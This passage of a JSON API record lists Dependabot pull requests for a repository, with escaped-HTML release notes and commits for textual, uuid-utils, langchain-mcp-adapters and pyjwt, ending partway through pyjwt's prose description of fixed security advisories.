href=\"https://redirect.github.com/Textualize/textual/pull/6546\"\u003eTextualize/textual#6546\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Textualize/textual/commit/182277f69011ba0b9665a9a1b1b0c3e89630e913\"\u003e\u003ccode\u003e182277f\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/Textualize/textual/issues/6546\"\u003e#6546\u003c/a\u003e from Textualize/ansi-opacity\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Textualize/textual/commit/49cbec44ffef26d94ddd42065bcb59a0017acd1a\"\u003e\u003ccode\u003e49cbec4\u003c/code\u003e\u003c/a\u003e bump\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Textualize/textual/commit/b24ef07d422b4ca82d0e65189a0659d032036bf4\"\u003e\u003ccode\u003eb24ef07\u003c/code\u003e\u003c/a\u003e snapshot\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Textualize/textual/commit/24e34e48a375ae83c607400809c699d88d423b88\"\u003e\u003ccode\u003e24e34e4\u003c/code\u003e\u003c/a\u003e changelog\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Textualize/textual/commit/0c8bbc7eaa3a83b3e2b8b8a35f3e69ec07682b41\"\u003e\u003ccode\u003e0c8bbc7\u003c/code\u003e\u003c/a\u003e text opacity change\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Textualize/textual/commit/3b04f316e72d071e212046a01f6b9f9976c77e5c\"\u003e\u003ccode\u003e3b04f31\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/Textualize/textual/issues/6543\"\u003e#6543\u003c/a\u003e from Textualize/textarea-actions\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Textualize/textual/commit/913f5d28cd4aa423f5d9fb9a967cebffa41646aa\"\u003e\u003ccode\u003e913f5d2\u003c/code\u003e\u003c/a\u003e test fixes\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Textualize/textual/commit/1027c41662ec4c6c3e50f658f548ea33cbdf9233\"\u003e\u003ccode\u003e1027c41\u003c/code\u003e\u003c/a\u003e ctrl+f replaced with ctrl+delete\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Textualize/textual/commit/01fb6fd73af092fe6e5da03c032d3e9c3fa161f1\"\u003e\u003ccode\u003e01fb6fd\u003c/code\u003e\u003c/a\u003e ctrl+backspace binding\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Textualize/textual/commit/54317091b8a57ab19a5512ef8479d1748d0c6de4\"\u003e\u003ccode\u003e5431709\u003c/code\u003e\u003c/a\u003e words\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/Textualize/textual/compare/v8.2.6...v8.2.7\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `uuid-utils` from 0.15.0 to 0.16.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/aminalaee/uuid-utils/releases\"\u003euuid-utils's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e0.16.0\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eOptimize uuid_utils.compat with \u003ccode\u003efrom_int\u003c/code\u003e by \u003ca href=\"https://github.com/aminalaee\"\u003e\u003ccode\u003e@​aminalaee\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/aminalaee/uuid-utils/pull/166\"\u003eaminalaee/uuid-utils#166\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efix: return version None for non-RFC UUIDs by \u003ca href=\"https://github.com/aminalaee\"\u003e\u003ccode\u003e@​aminalaee\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/aminalaee/uuid-utils/pull/163\"\u003eaminalaee/uuid-utils#163\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eValidate \u003ccode\u003enode\u003c/code\u003e argument out of range in constructor by \u003ca href=\"https://github.com/aminalaee\"\u003e\u003ccode\u003e@​aminalaee\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/aminalaee/uuid-utils/pull/164\"\u003eaminalaee/uuid-utils#164\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eDrop Python3.9 by \u003ca href=\"https://github.com/aminalaee\"\u003e\u003ccode\u003e@​aminalaee\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/aminalaee/uuid-utils/pull/168\"\u003eaminalaee/uuid-utils#168\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/aminalaee/uuid-utils/compare/0.15.0...0.16.0\"\u003ehttps://github.com/aminalaee/uuid-utils/compare/0.15.0...0.16.0\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aminalaee/uuid-utils/commit/5fbd5e6eec51fe20faa3fc67c1274ed7abd9388d\"\u003e\u003ccode\u003e5fbd5e6\u003c/code\u003e\u003c/a\u003e Version 0.16.0 (\u003ca href=\"https://redirect.github.com/aminalaee/uuid-utils/issues/169\"\u003e#169\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aminalaee/uuid-utils/commit/24438fb3ed80a2e565addedf5cb63e9032319a2c\"\u003e\u003ccode\u003e24438fb\u003c/code\u003e\u003c/a\u003e Drop Python3.9 (\u003ca href=\"https://redirect.github.com/aminalaee/uuid-utils/issues/168\"\u003e#168\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aminalaee/uuid-utils/commit/2bc4813859608bd09cc7335a70174eff5c31f037\"\u003e\u003ccode\u003e2bc4813\u003c/code\u003e\u003c/a\u003e Migrate to Zensical (\u003ca href=\"https://redirect.github.com/aminalaee/uuid-utils/issues/167\"\u003e#167\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aminalaee/uuid-utils/commit/cf0bdf46b63c66faf42d8543bb89976a1da52abf\"\u003e\u003ccode\u003ecf0bdf4\u003c/code\u003e\u003c/a\u003e Switch mypy to ty\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aminalaee/uuid-utils/commit/304700ea6c74d9c60a8e5dff1342893c3b85fb4d\"\u003e\u003ccode\u003e304700e\u003c/code\u003e\u003c/a\u003e chore: minor improvements for consistency\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aminalaee/uuid-utils/commit/0aeb1d4f68fec5bf2eb221886f60bdd6325f3a53\"\u003e\u003ccode\u003e0aeb1d4\u003c/code\u003e\u003c/a\u003e Fix benchmark URL in README\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aminalaee/uuid-utils/commit/49ca99d5e386a24729d7b0aa6d1c9c0802b7218d\"\u003e\u003ccode\u003e49ca99d\u003c/code\u003e\u003c/a\u003e Optimize uuid_utils.compat with \u003ccode\u003efrom_int\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/aminalaee/uuid-utils/issues/166\"\u003e#166\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aminalaee/uuid-utils/commit/c6b04aaa294b5ce7463a50d84715cf963eac14f6\"\u003e\u003ccode\u003ec6b04aa\u003c/code\u003e\u003c/a\u003e Validate \u003ccode\u003enode\u003c/code\u003e argument out of range in constructor (\u003ca href=\"https://redirect.github.com/aminalaee/uuid-utils/issues/164\"\u003e#164\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aminalaee/uuid-utils/commit/f3faea976cd6b60ff078f23f86ef919b75b319dc\"\u003e\u003ccode\u003ef3faea9\u003c/code\u003e\u003c/a\u003e fix: return version None for non-RFC UUIDs (\u003ca href=\"https://redirect.github.com/aminalaee/uuid-utils/issues/163\"\u003e#163\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/aminalaee/uuid-utils/compare/0.15.0...0.16.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `langchain-mcp-adapters` from 0.2.2 to 0.3.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/langchain-ai/langchain-mcp-adapters/releases\"\u003elangchain-mcp-adapters's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003elangchain-mcp-adapters==0.3.0\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003ebuild(deps): bump ncipollo/release-action from 1.20.0 to 1.21.0 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/langchain-ai/langchain-mcp-adapters/pull/441\"\u003elangchain-ai/langchain-mcp-adapters#441\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003echore: update dependabot.yml to comply with posture checks by \u003ca href=\"https://github.com/jkennedyvz\"\u003e\u003ccode\u003e@​jkennedyvz\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/langchain-ai/langchain-mcp-adapters/pull/448\"\u003elangchain-ai/langchain-mcp-adapters#448\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eci: pin pypa/gh-action-pypi-publish to stable commit SHA by \u003ca href=\"https://github.com/jkennedyvz\"\u003e\u003ccode\u003e@​jkennedyvz\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/langchain-ai/langchain-mcp-adapters/pull/447\"\u003elangchain-ai/langchain-mcp-adapters#447\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ebuild(deps): bump requests from 2.32.5 to 2.33.0 in the uv group across 1 directory by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/langchain-ai/langchain-mcp-adapters/pull/446\"\u003elangchain-ai/langchain-mcp-adapters#446\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ebuild(deps): bump pypa/gh-action-pypi-publish from 106e0b0b7c337fa67ed433972f777c6357f78598 to ed0c53931b1dc9bd32cbe73a98c7f6766f8a527e by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/langchain-ai/langchain-mcp-adapters/pull/449\"\u003elangchain-ai/langchain-mcp-adapters#449\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ebuild(deps): bump the minor-and-patch group with 6 updates by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/langchain-ai/langchain-mcp-adapters/pull/450\"\u003elangchain-ai/langchain-mcp-adapters#450\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ebuild(deps-dev): bump pytest from 8.4.2 to 9.0.2 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/langchain-ai/langchain-mcp-adapters/pull/451\"\u003elangchain-ai/langchain-mcp-adapters#451\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ebuild(deps-dev): bump websockets from 15.0.1 to 16.0 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/langchain-ai/langchain-mcp-adapters/pull/452\"\u003elangchain-ai/langchain-mcp-adapters#452\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ebuild(deps-dev): bump types-setuptools from 80.9.0.20250822 to 82.0.0.20260210 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/langchain-ai/langchain-mcp-adapters/pull/453\"\u003elangchain-ai/langchain-mcp-adapters#453\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ebuild(deps): bump cryptography from 46.0.5 to 46.0.6 in /examples/servers/streamable-http-stateless in the uv group across 1 directory by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/langchain-ai/langchain-mcp-adapters/pull/454\"\u003elangchain-ai/langchain-mcp-adapters#454\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ebuild(deps): bump cryptography from 46.0.5 to 46.0.6 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/langchain-ai/langchain-mcp-adapters/pull/455\"\u003elangchain-ai/langchain-mcp-adapters#455\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ebuild(deps): bump the minor-and-patch group with 4 updates by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/langchain-ai/langchain-mcp-adapters/pull/461\"\u003elangchain-ai/langchain-mcp-adapters#461\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efix: patch 3 security alerts (high + low severity) by \u003ca href=\"https://github.com/jkennedyvz\"\u003e\u003ccode\u003e@​jkennedyvz\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/langchain-ai/langchain-mcp-adapters/pull/463\"\u003elangchain-ai/langchain-mcp-adapters#463\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ebuild(deps): bump cryptography from 46.0.6 to 46.0.7 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/langchain-ai/langchain-mcp-adapters/pull/473\"\u003elangchain-ai/langchain-mcp-adapters#473\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ebuild(deps): bump cryptography from 46.0.6 to 46.0.7 in /examples/servers/streamable-http-stateless in the uv group across 1 directory by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/langchain-ai/langchain-mcp-adapters/pull/471\"\u003elangchain-ai/langchain-mcp-adapters#471\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ebuild(deps): bump langchain-core from 1.2.24 to 1.2.28 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/langchain-ai/langchain-mcp-adapters/pull/472\"\u003elangchain-ai/langchain-mcp-adapters#472\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ebuild(deps): bump pytest from 8.3.5 to 9.0.3 in /examples/servers/streamable-http-stateless in the uv group across 1 directory by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/langchain-ai/langchain-mcp-adapters/pull/476\"\u003elangchain-ai/langchain-mcp-adapters#476\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ebuild(deps-dev): bump pytest from 9.0.2 to 9.0.3 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/langchain-ai/langchain-mcp-adapters/pull/477\"\u003elangchain-ai/langchain-mcp-adapters#477\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ebuild(deps): bump python-multipart from 0.0.22 to 0.0.26 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/langchain-ai/langchain-mcp-adapters/pull/481\"\u003elangchain-ai/langchain-mcp-adapters#481\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ebuild(deps): bump langsmith from 0.6.3 to 0.7.31 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/langchain-ai/langchain-mcp-adapters/pull/482\"\u003elangchain-ai/langchain-mcp-adapters#482\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ebuild(deps): bump python-multipart from 0.0.22 to 0.0.26 in /examples/servers/streamable-http-stateless in the uv group across 1 directory by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/langchain-ai/langchain-mcp-adapters/pull/483\"\u003elangchain-ai/langchain-mcp-adapters#483\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ebuild(deps): bump python-dotenv from 1.1.0 to 1.2.2 in /examples/servers/streamable-http-stateless in the uv group across 1 directory by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/langchain-ai/langchain-mcp-adapters/pull/485\"\u003elangchain-ai/langchain-mcp-adapters#485\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ebuild(deps): bump python-dotenv from 1.1.1 to 1.2.2 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/langchain-ai/langchain-mcp-adapters/pull/486\"\u003elangchain-ai/langchain-mcp-adapters#486\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eci(infra): harden Dependabot version-bound preservation by \u003ca href=\"https://github.com/open-swe\"\u003e\u003ccode\u003e@​open-swe\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/langchain-ai/langchain-mcp-adapters/pull/512\"\u003elangchain-ai/langchain-mcp-adapters#512\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ebuild(deps): bump urllib3 from 2.6.3 to 2.7.0 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/langchain-ai/langchain-mcp-adapters/pull/506\"\u003elangchain-ai/langchain-mcp-adapters#506\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ebuild(deps): bump langsmith from 0.7.31 to 0.8.0 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/langchain-ai/langchain-mcp-adapters/pull/508\"\u003elangchain-ai/langchain-mcp-adapters#508\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ebuild(deps): bump the minor-and-patch group across 1 directory with 2 updates by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/langchain-ai/langchain-mcp-adapters/pull/513\"\u003elangchain-ai/langchain-mcp-adapters#513\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ebuild(deps-dev): bump types-setuptools from 82.0.0.20260210 to 82.0.0.20260518 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/langchain-ai/langchain-mcp-adapters/pull/514\"\u003elangchain-ai/langchain-mcp-adapters#514\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ebuild(deps): bump idna from 3.10 to 3.15 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/langchain-ai/langchain-mcp-adapters/pull/516\"\u003elangchain-ai/langchain-mcp-adapters#516\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ebuild(deps): bump python-multipart from 0.0.26 to 0.0.27 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/langchain-ai/langchain-mcp-adapters/pull/504\"\u003elangchain-ai/langchain-mcp-adapters#504\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ebuild(deps): bump pypa/gh-action-pypi-publish from 1.13.0 to 1.14.0 in the minor-and-patch group across 1 directory by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/langchain-ai/langchain-mcp-adapters/pull/499\"\u003elangchain-ai/langchain-mcp-adapters#499\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ebuild(deps): bump the uv group across 1 directory with 2 updates by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/langchain-ai/langchain-mcp-adapters/pull/517\"\u003elangchain-ai/langchain-mcp-adapters#517\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ebuild(deps): bump starlette from 0.50.0 to 1.0.1 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/langchain-ai/langchain-mcp-adapters/pull/537\"\u003elangchain-ai/langchain-mcp-adapters#537\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ebuild(deps): bump starlette from 0.49.1 to 1.0.1 in /examples/servers/streamable-http-stateless in the uv group across 1 directory by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/langchain-ai/langchain-mcp-adapters/pull/536\"\u003elangchain-ai/langchain-mcp-adapters#536\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ebuild(deps-dev): bump mypy from 1.20.0 to 2.1.0 in the major group by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/langchain-ai/langchain-mcp-adapters/pull/535\"\u003elangchain-ai/langchain-mcp-adapters#535\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ebuild(deps): bump the minor-and-patch group with 4 updates by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/langchain-ai/langchain-mcp-adapters/pull/534\"\u003elangchain-ai/langchain-mcp-adapters#534\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efix: use non-deprecated streamable HTTP client by \u003ca href=\"https://github.com/mdrxy\"\u003e\u003ccode\u003e@​mdrxy\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/langchain-ai/langchain-mcp-adapters/pull/541\"\u003elangchain-ai/langchain-mcp-adapters#541\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efeat: surface MCP tool execution errors as failed tool output by \u003ca href=\"https://github.com/mdrxy\"\u003e\u003ccode\u003e@​mdrxy\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/langchain-ai/langchain-mcp-adapters/pull/540\"\u003elangchain-ai/langchain-mcp-adapters#540\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003erelease: 0.3.0 by \u003ca href=\"https://github.com/mdrxy\"\u003e\u003ccode\u003e@​mdrxy\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/langchain-ai/langchain-mcp-adapters/pull/542\"\u003elangchain-ai/langchain-mcp-adapters#542\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eNew Contributors\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/open-swe\"\u003e\u003ccode\u003e@​open-swe\u003c/code\u003e\u003c/a\u003e[bot] made their first contribution in \u003ca href=\"https://redirect.github.com/langchain-ai/langchain-mcp-adapters/pull/512\"\u003elangchain-ai/langchain-mcp-adapters#512\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/langchain-ai/langchain-mcp-adapters/compare/langchain-mcp-adapters==0.2.2...langchain-mcp-adapters==0.3.0\"\u003ehttps://github.com/langchain-ai/langchain-mcp-adapters/compare/langchain-mcp-adapters==0.2.2...langchain-mcp-adapters==0.3.0\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/langchain-ai/langchain-mcp-adapters/commit/a61c783a7949719a8c3fbe4aeba961f45f3b7849\"\u003e\u003ccode\u003ea61c783\u003c/code\u003e\u003c/a\u003e release: 0.3.0 (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain-mcp-adapters/issues/542\"\u003e#542\u003c/a\u003e...\n\n_Description has been truncated_","html_url":"https://github.com/bogware/bog-agents/pull/130","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/bogware%2Fbog-agents/issues/130","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/130/packages"}},{"old_version":"2.10.1","new_version":"2.13.0","update_type":"minor","path":null,"pr_created_at":"2026-06-14T06:04:28.000Z","version_change":"2.10.1 → 2.13.0","issue":{"uuid":"4658106420","node_id":"PR_kwDOSzUwoM7mMJzs","number":27,"state":"open","title":"⬆ Bump pyjwt from 2.10.1 to 2.13.0","user":"dependabot[bot]","labels":["internal"],"assignees":[],"locked":false,"comments_count":2,"pull_request":true,"closed_at":null,"author_association":null,"state_reason":null,"created_at":"2026-06-14T06:04:28.000Z","updated_at":"2026-06-14T06:06:48.000Z","time_to_close":null,"merged_at":null,"merged_by":null,"closed_by":null,"dependency_metadata":{"prefix":"⬆ Bump","packages":[{"name":"pyjwt","old_version":"2.10.1","new_version":"2.13.0","repository_url":"https://github.com/jpadilla/pyjwt"}],"path":null,"ecosystem":"pip"},"body":"Bumps [pyjwt](https://github.com/jpadilla/pyjwt) from 2.10.1 to 2.13.0.\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/jpadilla/pyjwt/releases\"\u003epyjwt's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e2.13.0\u003c/h2\u003e\n\u003ch1\u003ePyJWT 2.13.0 — Security Release\u003c/h1\u003e\n\u003cp\u003eThis release bundles five security fixes plus three additional hardening / spec-compliance changes. We recommend all users upgrade.\u003c/p\u003e\n\u003ch2\u003eSecurity\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/security/advisories/GHSA-xgmm-8j9v-c9wx\"\u003e\u003ccode\u003eGHSA-xgmm-8j9v-c9wx\u003c/code\u003e\u003c/a\u003e — JWK JSON accepted as HMAC secret (algorithm confusion).\u003c/strong\u003e \u003ccode\u003eHMACAlgorithm.prepare_key\u003c/code\u003e previously rejected PEM- and SSH-formatted asymmetric keys but did not catch a JWK passed as a raw JSON string. In a verifier configured with both symmetric and asymmetric algorithms in \u003ccode\u003ealgorithms=[…]\u003c/code\u003e and a raw-JSON JWK as the key, an attacker could forge HS256 tokens using the JWK text as the HMAC secret. The guard has been extended to reject any JWK-shaped JSON. \u003cem\u003eReported by \u003ca href=\"https://github.com/aradona91\"\u003e\u003ccode\u003e@​aradona91\u003c/code\u003e\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/security/advisories/GHSA-jq35-7prp-9v3f\"\u003e\u003ccode\u003eGHSA-jq35-7prp-9v3f\u003c/code\u003e\u003c/a\u003e — Algorithm allow-list bypass with \u003ccode\u003ePyJWK\u003c/code\u003e / \u003ccode\u003ePyJWKClient\u003c/code\u003e.\u003c/strong\u003e When verifying with a \u003ccode\u003ePyJWK\u003c/code\u003e, the caller's \u003ccode\u003ealgorithms=[…]\u003c/code\u003e allow-list was checked against the token header 